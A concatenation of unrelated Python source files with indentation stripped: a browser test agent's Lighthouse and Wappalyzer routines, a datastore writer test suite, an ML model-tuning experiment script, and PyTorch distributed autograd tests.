self.devtools.set_header(command['target'])
elif command['command'] == 'resetheaders':
self.devtools.reset_headers()
elif command['command'] == 'clearcache':
self.devtools.clear_cache()
elif command['command'] == 'disablecache':
disable_cache = bool('target' in command and \
int(re.search(r'\d+',
str(command['target'])).group()) == 1)
self.devtools.disable_cache(disable_cache)
def navigate(self, url):
"""Navigate to the given URL"""
if self.devtools is not None:
self.devtools.send_command('Page.navigate', {'url': url}, wait=True)
def get_requests(self):
"""Get the request details for running an optimization check"""
requests = None
if self.devtools is not None:
requests = self.devtools.get_requests()
return requests
def lighthouse_thread(self):
"""Run lighthouse in a thread so we can kill it if it times out"""
cmd = self.lighthouse_command
self.task['lighthouse_log'] = cmd + "\n"
logging.debug(cmd)
proc = subprocess.Popen(cmd, shell=True, stderr=subprocess.PIPE)
for line in iter(proc.stderr.readline, b''):
try:
line = unicode(line)
logging.debug(line.rstrip())
self.task['lighthouse_log'] += line
except Exception:
logging.exception('Error recording lighthouse log')
proc.communicate()
def run_lighthouse_test(self, task):
"""Run a lighthouse test against the current browser session"""
task['lighthouse_log'] = ''
if 'url' in self.job and self.job['url'] is not None:
self.job['shaper'].configure(self.job, task)
output_path = os.path.join(task['dir'], 'lighthouse.json')
json_file = os.path.join(task['dir'], 'lighthouse.report.json')
json_gzip = os.path.join(task['dir'], 'lighthouse.json.gz')
html_file = os.path.join(task['dir'], 'lighthouse.report.html')
html_gzip = os.path.join(task['dir'], 'lighthouse.html.gz')
time_limit = min(int(task['time_limit']), 80)
command = ['lighthouse',
'"{0}"'.format(self.job['url']),
'--channel', 'wpt',
'--disable-network-throttling',
'--disable-cpu-throttling',
'--throttling-method', 'provided',
'--enable-error-reporting',
'--max-wait-for-load', str(int(time_limit * 1000)),
'--port', str(task['port']),
'--output', 'html',
'--output', 'json',
'--output-path', '"{0}"'.format(output_path)]
if self.job['keep_lighthouse_trace']:
command.append('--save-assets')
if not self.job['keep_lighthouse_screenshots']:
command.extend(['--skip-audits', 'screenshot-thumbnails'])
if self.options.android or 'mobile' not in self.job or not self.job['mobile']:
command.extend(['--emulated-form-factor', 'none'])
if 'user_agent_string' in self.job:
sanitized_user_agent = re.sub(r'[^a-zA-Z0-9_\-.;:/()\[\] ]+', '', self.job['user_agent_string'])
command.append('--chrome-flags="--user-agent=\'{0}\'"'.format(sanitized_user_agent))
if len(task['block']):
for pattern in task['block']:
pattern = "'" + pattern.replace("'", "'\\''") + "'"
command.extend(['--blocked-url-patterns', pattern])
if 'headers' in task:
headers_file = os.path.join(task['dir'], 'lighthouse-headers.json')
with io.open(headers_file, 'w', encoding='utf-8') as f_out:
json.dump(task['headers'], f_out)
command.extend(['--extra-headers', '"{0}"'.format(headers_file)])
cmd = ' '.join(command)
self.lighthouse_command = cmd
# Give lighthouse up to 10 minutes to run all of the audits
try:
lh_thread = threading.Thread(target=self.lighthouse_thread)
lh_thread.start()
lh_thread.join(600)
except Exception:
logging.exception('Error running lighthouse audits')
from .os_util import kill_all
kill_all('node', True)
self.job['shaper'].reset()
# Rename and compress the trace file, delete the other assets
if self.job['keep_lighthouse_trace']:
try:
lh_trace_src = os.path.join(task['dir'], 'lighthouse-0.trace.json')
if os.path.isfile(lh_trace_src):
# read the JSON in and re-write it line by line to match the other traces
with io.open(lh_trace_src, 'r', encoding='utf-8') as f_in:
trace = json.load(f_in)
if trace is not None and 'traceEvents' in trace:
lighthouse_trace = os.path.join(task['dir'],
'lighthouse_trace.json.gz')
with gzip.open(lighthouse_trace, GZIP_TEXT, 7) as f_out:
f_out.write('{"traceEvents":[{}')
for trace_event in trace['traceEvents']:
f_out.write(",\n")
f_out.write(json.dumps(trace_event))
f_out.write("\n]}")
except Exception:
logging.exception('Error processing lighthouse trace')
# Delete all the left-over lighthouse assets
files = glob.glob(os.path.join(task['dir'], 'lighthouse-*'))
for file_path in files:
try:
os.remove(file_path)
except Exception:
pass
if os.path.isfile(json_file):
lh_report = None
with io.open(json_file, 'r', encoding='utf-8') as f_in:
lh_report = json.load(f_in)
with open(json_file, 'rb') as f_in:
with gzip.open(json_gzip, 'wb', 7) as f_out:
shutil.copyfileobj(f_in, f_out)
try:
os.remove(json_file)
except Exception:
pass
# Extract the audit scores
if lh_report is not None:
audits = {}
# v1.x
if 'aggregations' in lh_report:
for entry in lh_report['aggregations']:
if 'name' in entry and 'total' in entry and \
'scored' in entry and entry['scored']:
name = entry['name'].replace(' ', '')
audits[name] = entry['total']
# v2.x
elif 'reportCategories' in lh_report:
for category in lh_report['reportCategories']:
if 'name' in category and 'score' in category:
category_name = category['name'].replace(' ', '')
score = float(category['score']) / 100.0
audits[category_name] = score
if category['name'] == 'Performance' and 'audits' in category:
for audit in category['audits']:
if 'id' in audit and 'group' in audit and \
audit['group'] == 'perf-metric' and \
'result' in audit and \
'rawValue' in audit['result']:
name = category_name + '.' + \
audit['id'].replace(' ', '')
audits[name] = audit['result']['rawValue']
# v3.x
elif 'categories' in lh_report:
for categoryId in lh_report['categories']:
category = lh_report['categories'][categoryId]
if 'title' not in category or 'score' not in category:
continue
category_title = category['title'].replace(' ', '')
audits[category_title] = category['score']
if categoryId != 'performance' or 'auditRefs' not in category:
continue
for auditRef in category['auditRefs']:
if auditRef['id'] not in lh_report['audits']:
continue
if 'group' not in auditRef or auditRef['group'] != 'metrics':
continue
audit = lh_report['audits'][auditRef['id']]
name = category_title + '.' + audit['id']
if 'rawValue' in audit:
audits[name] = audit['rawValue']
elif 'numericValue' in audit:
audits[name] = audit['numericValue']
audits_gzip = os.path.join(task['dir'], 'lighthouse_audits.json.gz')
with gzip.open(audits_gzip, GZIP_TEXT, 7) as f_out:
json.dump(audits, f_out)
# Compress the HTML lighthouse report
if os.path.isfile(html_file):
try:
with open(html_file, 'rb') as f_in:
with gzip.open(html_gzip, 'wb', 7) as f_out:
shutil.copyfileobj(f_in, f_out)
os.remove(html_file)
except Exception:
logging.exception('Error compressing lighthouse report')
def wappalyzer_detect(self, task, request_headers):
"""Run the wappalyzer detection"""
# Run the Wappalyzer detection (give it 30 seconds at most)
completed = False
if self.devtools is not None:
try:
logging.debug('wappalyzer_detect')
detect_script = self.wappalyzer_script(request_headers)
response = self.devtools.send_command("Runtime.evaluate",
{'expression': detect_script,
'awaitPromise': True,
'returnByValue': True,
'timeout': 30000},
wait=True, timeout=30)
if response is not None and 'result' in response and\
'result' in response['result'] and\
'value' in response['result']['result']:
result = response['result']['result']['value']
if result:
completed = True
logging.debug(result)
detected = json.loads(result)
if 'categories' in detected:
task['page_data']['detected'] = dict(detected['categories'])
if 'apps' in detected:
task['page_data']['detected_apps'] = dict(detected['apps'])
except Exception as err:
logging.exception("Exception running Wappalyzer: %s", err.__str__())
if not completed:
task['page_data']['wappalyzer_failed'] = 1
def wappalyzer_script(self, response_headers):
"""Build the wappalyzer script to run in-browser"""
script = None
try:
with open(os.path.join(self.support_path, 'Wappalyzer', 'script.js')) as f_in:
script = f_in.read()
if script is not None:
wappalyzer = None
with open(os.path.join(self.support_path, 'Wappalyzer', 'wappalyzer.js')) as f_in:
wappalyzer = f_in.read()
if wappalyzer is not None:
json_data = None
with open(os.path.join(self.support_path, 'Wappalyzer', 'apps.json')) as f_in:
json_data = f_in.read()
if json is not None:
# Format the headers as a dictionary of lists
headers = {}
if response_headers is not None:
if isinstance(response_headers, dict):
for key in response_headers:
values = []
entry = response_headers[key]
if isinstance(entry, list):
values = entry
elif isinstance(entry, (str, unicode)):
entries = entry.split('\n')
for value in entries:
values.append(value.strip())
if values:
headers[key.lower()] = values
elif isinstance(response_headers, list):
for pair in response_headers:
if isinstance(pair, (str, unicode)):
parts = pair.split(':', 1)
key = parts[0].strip(' :\n\t').lower()
value = parts[1].strip(' :\n\t')
if key not in headers:
headers[key] = []
headers[key].append(value)
script = script.replace('%WAPPALYZER%', wappalyzer)
script = script.replace('%JSON%', json_data)
script = script.replace('%RESPONSE_HEADERS%', json.dumps(headers))
except Exception:
logging.exception('Error building wappalyzer script')
return script
|
test_writer_service.py
|
import threading
from threading import Thread
from unittest.mock import MagicMock
import pytest
from datastore.shared.di import injector
from datastore.shared.services import EnvironmentService
from datastore.writer.core import (
Database,
Messaging,
OccLocker,
RequestCreateEvent,
RequestDeleteEvent,
Writer,
WriteRequest,
)
from datastore.writer.core.event_executor import EventExecutor
from datastore.writer.core.event_translator import EventTranslator
from datastore.writer.core.writer_service import WriterService
from tests import reset_di # noqa
@pytest.fixture(autouse=True)
def provide_di(reset_di): # noqa
injector.register_as_singleton(Database, MagicMock)
injector.register_as_singleton(OccLocker, lambda: MagicMock(unsafe=True))
injector.register_as_singleton(EventTranslator, MagicMock)
injector.register_as_singleton(EventExecutor, MagicMock)
injector.register_as_singleton(Messaging, MagicMock)
injector.register(Writer, WriterService)
injector.register(EnvironmentService, EnvironmentService)
yield
@pytest.fixture()
def writer(provide_di):
yield injector.get(Writer)
@pytest.fixture()
def database(provide_di):
yield injector.get(Database)
@pytest.fixture()
def occ_locker(provide_di):
yield injector.get(OccLocker)
@pytest.fixture()
def event_translator(provide_di):
yield injector.get(EventTranslator)
@pytest.fixture()
def event_executor(provide_di):
yield injector.get(EventExecutor)
@pytest.fixture()
def messaging(provide_di):
yield injector.get(Messaging)
def test_writer_creation(writer):
assert bool(writer)
def test_writer_distribution(
writer, database, occ_locker, event_translator, event_executor, messaging
):
events = [RequestCreateEvent("a/1", {"a": 1}), RequestDeleteEvent("b/2")]
locked_fields = {
"c/1": 3,
"c/2/f": 4,
"c/f": 5,
}
write_request = WriteRequest(events, {}, 1, locked_fields)
event_translator.translate = MagicMock(return_value=[2, 3, 4])
event_executor.update = eeu = MagicMock()
messaging.handle_events = he = MagicMock()
writer.write([write_request])
event_translator.translate.assert_called_with(events)
database.get_context.assert_called()
occ_locker.assert_locked_fields.assert_called_with(write_request)
database.insert_events.assert_called_with([2, 3, 4], {}, 1)
eeu.assert_called_once()
he.assert_called_once()
def test_writer_reserve_ids(writer, database):
writer.reserve_ids("collection", 4)
database.get_context.assert_called()
database.reserve_next_ids.assert_called_with("collection", 4)
def test_writer_truncate_db(writer, database):
writer.truncate_db()
database.get_context.assert_called()
database.truncate_db.assert_called()
def test_writer_single_thread(writer):
writer.locks = [threading.Lock(), threading.Lock()]
writer.locks[0].acquire()
writer.current_lock = 0
writer.position = 0
def wait_for_lock(*args, **kwargs):
lock = writer.locks[writer.current_lock]
writer.current_lock += 1
lock.acquire()
lock.release()
writer.event_translator = MagicMock()
writer.messaging = MagicMock()
writer.write_with_database_context = MagicMock(side_effect=wait_for_lock)
thread1 = Thread(target=writer.write, args=[[MagicMock()]])
thread1.start()
thread2 = Thread(target=writer.write, args=[[MagicMock()]])
thread2.start()
thread1.join(0.5)
assert thread1.is_alive()
assert thread2.is_alive()
assert writer.locks[0].locked()
assert not writer.locks[1].locked()
writer.locks[0].release()
thread1.join(0.05)
thread2.join(0.05)
assert not thread1.is_alive()
assert not thread2.is_alive()
|
ours.py
|
import numpy as np
import multiprocessing as mp
from pdb import set_trace
from copy import deepcopy
from utmLib import utils
from utmLib.clses import Timer
from utmLib.parmapper import Xmap
from core.contcnet import ContCNet, nn_conf
from core.varpick import most_var, hard_max_mincorr
from core.tinylib import evaluate_result, logmass_statistic, pca_analysis
def fast_log_mass(m, data):
x_data = data[:,m.xids]
px_logmass = np.log(m.px.mass(x_data))
pyx_logmass = m.score(data, return_mass=True)
logmass = px_logmass + pyx_logmass
return logmass
def worker_func(param, extra):
# actual task to do
def _run_(param, extra, Q):
i, (X, lr, fr) = param
train, test, query, gt, sample_size, cache_dir, device, gpuid = extra
cf = deepcopy(nn_conf)
cf.fsize = fr
cf.max_LR = lr
if device != 'cpu':
cf.device = 'cuda:{}'.format(gpuid[i % len(gpuid)])
else:
cf.device = 'cpu'
model = ContCNet(mode='MixMG', conf=cf).fit(train, cutset_var=X, verbose=False)
model.save_as_file('{}/ours-{}.pt'.format(cache_dir, i))
pred = model.predict(test, query, N=int(sample_size/2), parallel=1)
perf = evaluate_result(gt, pred, query, output_var=1)
Q.put( (perf,i) )
queue = mp.Queue()
p = mp.Process(target=_run_, args = (param, extra, queue))
p.start()
ret = queue.get()
p.join()
p.terminate()
return ret
def tune_and_fit(train, valid, masked_valid, options, verbose = True):
full_train = np.vstack([train, valid])
# define hyper params to tune
cond_pcts = [i/10.0 for i in range(1,5)]
pick_method = [most_var]
max_LR = [0.025, 0.01, 0.004]
if options.transform is None:
feature_ratio = list(np.unique( pca_analysis(full_train, percentiles=[0.9, 0.95, 0.97, 0.99]) ))
else:
feature_ratio = [train.shape[1]]
allX = {}
for p,f in utils.product(cond_pcts, pick_method):
X = f(full_train, (p,2), np.inf, exclude = options.exclude)
X = tuple(sorted(X))
if X not in allX:
allX[X] = [ '{}-{}%'.format(f._name_, int(p*100)) ]
else:
allX[X].append( '{}-{}%'.format(f._name_, int(p*100)) )
varX = list(allX.keys())
maskV, queryV = masked_valid
params = list(enumerate(utils.product(varX, max_LR, feature_ratio)))
extra = (train, maskV, queryV, valid, options.sample_size, options.cache_dir, options.device, options.gpuid)
if verbose:
print( 'Total number of hyper-params:{}'.format(len(params)) )
options.procs = options.cpus if options.device == 'cpu' else (options.gpus*len(options.gpuid))
options.procs = min(options.procs, len(params))
tune_result = list(Xmap(worker_func, params, N=options.procs, daemon=False, progress=True, args=(extra,) ))
tune_result.sort()
# determine best idx
b_rmse, b_std = tune_result[0][0]
best_val = 2.0
best_idx = None
N = max(5, int(len(params)*0.1 + 1))
for perf, i in tune_result[0:N]:
r_rmse = perf[0] / b_rmse
r_std = perf[1] / b_std
val = r_rmse * r_std
if val < best_val:
best_val = val
best_idx = i
# print top hyper params and its performance
ntop = (N*5) if verbose else 1
for perf, i in tune_result[0:ntop]:
X, lr, fr = params[i][1]
method_str = '/'.join(allX[X])
postfix = '<- chosen' if i == best_idx else ''
print('{:2d}-Methods:{} ## MaxLR:{} FR:{} -> RMSE:{:.4f} STD:{:.4f} {}'.format(i, method_str, lr, fr, perf[0], perf[1], postfix))
best_model_path = '{}/ours-{}.pt'.format(options.cache_dir, best_idx)
def fine_tune():
ft_device = 'cpu' if options.device == 'cpu' else 'cuda:0'
model = ContCNet.load_from_file(best_model_path, device = ft_device)
model = model.refit(full_train, verbose = verbose)
model.save_as_file(best_model_path + '.fine_tune')
p = mp.Process(target=fine_tune)
p.start()
p.join()
p.terminate()
model = ContCNet.load_from_file(best_model_path + '.fine_tune', device = 'cpu')
return model
def run_exp(dataset, options):
print('Running our model ....')
np.random.seed(options.seed)
train, valid, test_set = dataset
full_train = np.vstack([train, valid])
myclock = Timer()
model_file = '{}/ours.model'.format(options.dir)
try:
model = ContCNet.load_from_file(model_file, device = 'cpu')
print('Load pretrained ccnet model.')
except:
model = tune_and_fit(train, valid, options.valid_extra, options)
if options.dir != '':
model.save_as_file(model_file)
# model.py.gbn.g.dump(fpath = '{}/leaf_gbn.jpg'.format(options.dir))
myclock.ring('model fitting')
N = len(model.yids)
nrm = model.removed_counter
total = int(N * (N-1)/2)
print('Number of edges removed: {}/{} = {:.2f}%'.format(nrm, total, 100*nrm/total))
print('MixMG number of components: {}'.format(model.px.W.size))
train_logmass = fast_log_mass(model, full_train)
test_logmass = fast_log_mass(model, options.gt)
print('Ours train logmass: p25 {:.6f} median {:.6f} p75 {:.6f} avg {:.6f}'.format( *logmass_statistic(train_logmass) ))
print('Ours test logmass: p25 {:.6f} median {:.6f} p75 {:.6f} avg {:.6f}'.format( *logmass_statistic(test_logmass) ))
myclock.ring('Ours logmass computation')
result = []
for i,query in enumerate(options.query_var):
model_result = []
test = test_set[i].copy()
pred = model.predict(test, query, N = options.sample_size, parallel = options.cpus)
model_result.append( ('Ours', pred ) )
if isinstance(options.missing[i], float) and options.missing[i] == 0:
# only output when doing map infernece, not mmap
pred_logmass = fast_log_mass(model, pred)
print('S{}, Ours pred logmass: p25 {:.6f} median {:.6f} p75 {:.6f} avg {:.6f}'.format(i, *logmass_statistic(pred_logmass) ))
myclock.ring('Ours predict')
result.append(model_result)
return result
|
dist_autograd_test.py
|
import sys
import threading
import time
import unittest
from enum import Enum
import torch
from datetime import timedelta
import torch.distributed as dist
import torch.distributed.autograd as dist_autograd
import torch.distributed.rpc as rpc
import torch.testing._internal.dist_utils
from torch.autograd import Function
from torch.autograd.function import once_differentiable
from torch.testing._internal.common_utils import IS_MACOS
from torch.testing._internal.dist_utils import (
dist_init,
initialize_pg,
wait_until_node_failure,
worker_name,
)
from torch.testing._internal.distributed.rpc.rpc_agent_test_fixture import (
RpcAgentTestFixture,
)
from torch.testing._internal.common_distributed import skip_if_lt_x_gpu
# Right now we test up to 3-layer nested rpc calls.
# rpc_done[1] and ctx_ids[1] represent rpc is done in prev rank, and context id
# sent from prev rank respectively.
# rpc_done[2] and ctx_ids[2] represents for prev of prev rank.
# rpc_done[3] and ctx_ids[3] represents for prev of prev of prev rank.
# rpc_done[0] and ctx_ids[0] represents for current rank, but mostly not used.
rpc_done = [False, False, False, False]
ctx_ids = [-1, -1, -1, -1]
known_context_ids = set()
requires_grad_tensor = torch.ones(3, 3, requires_grad=True)
# Send rpc done info and context_id to
# dst_rank = (self.rank + rank_distance) % self.world_size
# we don't need a lock here since the GIL is held while executing remote
# python UDFs, so access is serialized across several workers.
def _set_rpc_done(ctx_id, rank_distance):
global rpc_done
global ctx_ids
global known_context_ids
rpc_done[rank_distance] = True
ctx_ids[rank_distance] = ctx_id
known_context_ids.add(ctx_id)
def _check_rpc_done(rank_distance):
while not rpc_done[rank_distance]:
time.sleep(0.1)
def _torch_ones(sizes, requires_grad=False):
return torch.ones(sizes, requires_grad=requires_grad)
# This method must be called on the rref owner, and verifies that the grad of
# rref tensor equals to the given grad.
def _compare_owner_value(context_id, rref, grad):
grads = dist_autograd.get_gradients(context_id)
return torch.equal(grads[rref.local_value()], grad)
def create_tensor():
return torch.ones((3, 3), requires_grad=True)
@torch.jit.script
def create_torchscript_tensor():
# type: () -> Tensor
return torch.ones((3, 3)).requires_grad_()
def my_py_add(t1, t2):
return torch.add(t1, t2)
def my_scalar_add(a, b):
return a + b
def my_rref_add(rref_t1, t2):
ret = torch.add(rref_t1.local_value(), t2)
return ret
@torch.jit.script
def my_script_add(t1, t2):
return torch.add(t1, t2)
@torch.jit.script
def my_script_ref_add(ref_t1, t2):
# type: (RRef[Tensor], Tensor) -> Tensor
t1 = ref_t1.to_here()
return torch.add(t1, t2)
def my_nested_rref_add(dst, rref_t1, t2):
return rpc.rpc_sync(dst, my_rref_add, args=(rref_t1, t2))
def ret_requires_grad():
return requires_grad_tensor
def my_py_nested_call(t1, t2, dst, world_size, hops):
next_dst = (dst + 1) % world_size
if hops > 0:
return rpc.rpc_sync(
worker_name(next_dst),
my_py_nested_call,
args=(t1, t2, next_dst, world_size, hops - 1),
)
else:
return rpc.rpc_sync(worker_name(next_dst), my_py_add, args=(t1, t2))
# after dist autograd context is cleaned up, it should be cleaned up on other
# nodes. This helper allows timeout_seconds for those RPCs to be completed, and
# ensures that all the contexts have been cleaned up in that timeframe.any
def _all_contexts_cleaned_up(timeout_seconds=10):
global known_context_ids
start = time.time()
context_id_to_raised = set()
while (
time.time() - start < timeout_seconds
and context_id_to_raised != known_context_ids
):
for context_id in known_context_ids:
try:
dist_autograd._retrieve_context(context_id)
except RuntimeError:
context_id_to_raised.add(context_id)
# all contexts have been cleaned up if trying to retrieve any context resulted in a RuntimeError.
success = context_id_to_raised == known_context_ids
return success
# This function creates a dis atugorad context, run rpc_sync on the given ps,
# and then blocks until the ps has verified the grads are correctly accumulated.
def _run_trainer(rref_t1, t2, ps, rank_diff):
with dist_autograd.context() as context_id:
ret = rpc.rpc_sync(ps, my_rref_add, args=(rref_t1, t2))
dist_autograd.backward(context_id, [ret.sum()])
# prevent deleting dist autograd context
rpc.rpc_sync(ps, _set_rpc_done, args=(context_id, rank_diff))
rpc.rpc_sync(ps, _check_rpc_done, args=(0,))
# This function is the same as _run_trainer, except rpc calls torchscript
# function "my_script_ref_add" instead of python funciton "my_rref_add"
def _run_trainer_torchscript(rref_t1, t2, ps, rank_diff):
with dist_autograd.context() as context_id:
ret = rpc.rpc_sync(ps, my_script_ref_add, args=(rref_t1, t2))
dist_autograd.backward(context_id, [ret.sum()])
# prevent deleting dist autograd context
rpc.rpc_sync(ps, _set_rpc_done, args=(context_id, rank_diff))
rpc.rpc_sync(ps, _check_rpc_done, args=(0,))
class SimulateBackwardError(Function):
_simulate_error = True
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
if SimulateBackwardError._simulate_error:
raise Exception("Simulate error on backward pass")
else:
return input
class ExecMode(Enum):
LOCAL = 1 # Run the operation locally.
RPC_SYNC = 2 # Run the operation using rpc_sync
REMOTE = 3 # Run the operation using remote.
RPC_ASYNC = 4 # Run the operation using rpc_async
class DistAutogradTest(RpcAgentTestFixture):
def _exec_func_with_dst(self, dst, exec_mode, method, *args):
if ExecMode.LOCAL == exec_mode:
if len(args) == 1 and isinstance(args[0], list):
return method(*args[0])
return method(*args)
elif ExecMode.RPC_SYNC == exec_mode:
return rpc.rpc_sync(worker_name(dst), method, args=(args))
elif ExecMode.REMOTE == exec_mode:
return rpc.remote(worker_name(dst), method, args=(args)).to_here()
elif ExecMode.RPC_ASYNC == exec_mode:
fut = rpc.rpc_async(worker_name(dst), method, args=(args))
return fut.wait()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
def _exec_func(self, exec_mode, method, *args):
return self._exec_func_with_dst(
self._next_rank(), exec_mode, method, *args
)
def _next_rank(self):
if hasattr(self, "dst_rank"):
self.dst_rank = (self.dst_rank + 1) % self.world_size
if self.dst_rank == self.rank:
return self._next_rank()
else:
self.dst_rank = (self.rank + 1) % self.world_size
return self.dst_rank
def _check_rpc_done(self, rank_distance):
_check_rpc_done(rank_distance)
@dist_init
def test_autograd_context(self):
# Verify max possible id.
max_auto_increment = 281474976710655
self.assertEqual(
max_auto_increment + (self.worker_id << 48), dist_autograd._get_max_id()
)
context_ids = []
for i in range(200):
with dist_autograd.context() as context_id:
self.assertEqual(
context_id,
dist_autograd._retrieve_context(context_id)._context_id(),
)
# First 16 bits should be worker_id.
self.assertEqual(self.worker_id, context_id >> 48)
context_ids.append(context_id)
for context_id in context_ids:
with self.assertRaisesRegex(
RuntimeError,
"Could not find autograd context with id: {}".format(context_id),
):
dist_autograd._retrieve_context(context_id)
@dist_init
def test_nested_context(self):
with dist_autograd.context() as context_id:
# Nested contexts not supported.
with self.assertRaisesRegex(
RuntimeError, "Already have an autograd context id for this thread"
):
with dist_autograd.context() as context_id:
pass
# For current context, this rank sends t1 and t2 tensors to dst_rank,
# then get t3 = torch.add(t1, t2) result tensor.
# For the current context in this rank, it expects graph like this:
# send function:
# rpcSendBackward
# / \
# t1.AccumulateGrad t2.AccumulateGrad
#
# recv function:
#
# |
# t3.rpcRecvBackward
#
def _verify_graph_for_first_rpc_call(
self, send_function, recv_function, t1, t2, ret
):
# Retrieve the next functions in the graph.
next_funcs = send_function.next_functions
self.assertEqual(2, len(next_funcs))
# We should now hit t1 and t2 in the autograd graph.
self.assertEqual("torch::autograd::AccumulateGrad", next_funcs[0][0].name())
self.assertEqual(t1, next_funcs[0][0].variable)
self.assertEqual(0, next_funcs[0][1])
self.assertEqual("torch::autograd::AccumulateGrad", next_funcs[1][0].name())
self.assertEqual(t2, next_funcs[1][0].variable)
self.assertEqual(0, next_funcs[1][1])
# Test recv functions.
self.assertEqual(ret.grad_fn, recv_function)
# For a context passed from previous nested chain calls, this rank
# receives two tensors t1 and t2, executes torch.add(t1, t2) and sends
# result tensor t3 back.
# For this context in this rank, it expects graph like this:
# send and recv functions:
# rpcSendBackward
# |
# t3.AddBackward0
# / \
# t1.recvRpcBackward t2.recvRpcBackward
def _verify_graph_for_rpc_call_exec(self, send_function):
# Verify next function is AddBackward0
next_funcs = send_function.next_functions
self.assertEqual(1, len(next_funcs))
add_backward_fn = next_funcs[0][0]
self.assertEqual("AddBackward0", add_backward_fn.name())
# Verify the next two functions are the same recv backward function.
next_funcs = add_backward_fn.next_functions
self.assertEqual(2, len(next_funcs))
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[0][0].name()
)
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[1][0].name()
)
self.assertEqual(next_funcs[0][0], next_funcs[1][0])
# For a context passed from previous nested chain calls, this rank
# receives two tensors t1 and t2, forwards t1 and t2 tensors using
# nested rpc call to next dst. In return route, receive result tensor t3
# from next dst and forwarding t3 back to previous calls.
# For this context in this rank, it expects graph like this:
# send and recv functions for receiving and forwarding t1 and t2:
# rpcSendBackward
# / \
# t1.recvRpcBackward t2.recvRpcBackward
# send and recv functions for receiving and forwarding t3:
# rpcSendBackward
# |
# t3.recvRpcBackward
def _verify_graph_for_nested_rpc_call(self, ctx):
send_functions = ctx._send_functions()
self.assertEqual(2, len(send_functions))
# For send function when making nest rpc call,
# next functions of the send function are two recv functions
# for received two tensors from previous call
next_funcs = list(send_functions.values())[0].next_functions
self.assertEqual(2, len(next_funcs))
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[0][0].name()
)
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[1][0].name()
)
self.assertEqual(next_funcs[0][0], next_funcs[1][0])
# For send function when returning resonpose to previous call
# next function of the send function is the recv function
# for received tensor result returned from nested call
next_funcs = list(send_functions.values())[1].next_functions
self.assertEqual(1, len(next_funcs))
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[0][0].name()
)
def _test_graph(self, fn, exec_mode):
dst_rank = (self.rank + 1) % self.world_size
initialize_pg(self.init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(worker_name(dst_rank), fn, args=(t1, t2))
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), fn, args=(t1, t2)
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# Verify graph for current context id.
ctx = dist_autograd._current_context()
self.assertEqual(context_id, ctx._context_id())
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
recv_functions = ctx._recv_functions()
self.assertEqual(1, len(recv_functions))
self._verify_graph_for_first_rpc_call(
list(send_functions.values())[0],
list(recv_functions.values())[0],
t1,
t2,
ret,
)
# Wait for the prev rank to be done with rpc.
self._check_rpc_done(1)
# Verify graph for previous context id.
ctx = dist_autograd._retrieve_context(ctx_ids[1])
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
self._verify_graph_for_rpc_call_exec(list(send_functions.values())[0])
# this barrier is needed so one worker does not clean up their
# autograd context before another worker tries to access it.
dist.barrier()
# autograd context should be cleaned up by now.
with self.assertRaises(RuntimeError):
ctx = dist_autograd._retrieve_context(context_id)
# No autograd context available.
with self.assertRaises(RuntimeError):
ctx = dist_autograd._current_context()
@dist_init
def test_graph_for_builtin_call(self):
self._test_graph(torch.add, ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_python_call(self):
self._test_graph(my_py_add, ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_builtin_remote_call(self):
self._test_graph(torch.add, ExecMode.REMOTE)
@dist_init
def test_graph_for_python_remote_call(self):
self._test_graph(my_py_add, ExecMode.REMOTE)
# 3-layer nested calls
def _test_graph_for_py_nested_call(self, exec_mode):
dst_rank = (self.rank + 1) % self.world_size
initialize_pg(self.init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
nest_dst_rank = (dst_rank + 1) % self.world_size
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_py_nested_call,
args=(t1, t2, dst_rank, self.world_size, 1),
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank),
my_py_nested_call,
args=(t1, t2, dst_rank, self.world_size, 1),
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
# Barrier to ensure all RPCs are done.
dist.barrier()
for rd in [1, 2, 3]:
rpc.rpc_sync(
worker_name((self.rank + rd) % self.world_size),
_set_rpc_done,
args=(context_id, rd),
)
# Barrier to ensure all set_rpc_done have completed.
dist.barrier()
# For self.rank, it has 4 graphs to verify
# One is for current context id when this rank send first rpc call.
# Second one is for prev context id when this rank make 1st nested
# call.
# Third one is for prev prev context id when this rank make
# 2nd nested call.
# Last one is for prev prev prev context id when this rank
# execute the torch.add() operator.
# Verify first graph for current context id.
ctx = dist_autograd._current_context()
self.assertEqual(context_id, ctx._context_id())
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
recv_functions = ctx._recv_functions()
self.assertEqual(1, len(recv_functions))
self._verify_graph_for_first_rpc_call(
list(send_functions.values())[0],
list(recv_functions.values())[0],
t1,
t2,
ret,
)
# Verify second graph for 1st nested call.
ctx = dist_autograd._retrieve_context(ctx_ids[1])
self._verify_graph_for_nested_rpc_call(ctx)
# Verify third graph for 2nd nested call.
ctx = dist_autograd._retrieve_context(ctx_ids[2])
self._verify_graph_for_nested_rpc_call(ctx)
# verify last graph for rpc call execution.
ctx = dist_autograd._retrieve_context(ctx_ids[3])
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
self._verify_graph_for_rpc_call_exec(list(send_functions.values())[0])
# this barrier is needed so one worker does not clean up their
# autograd context before another worker tries to access it.
dist.barrier()
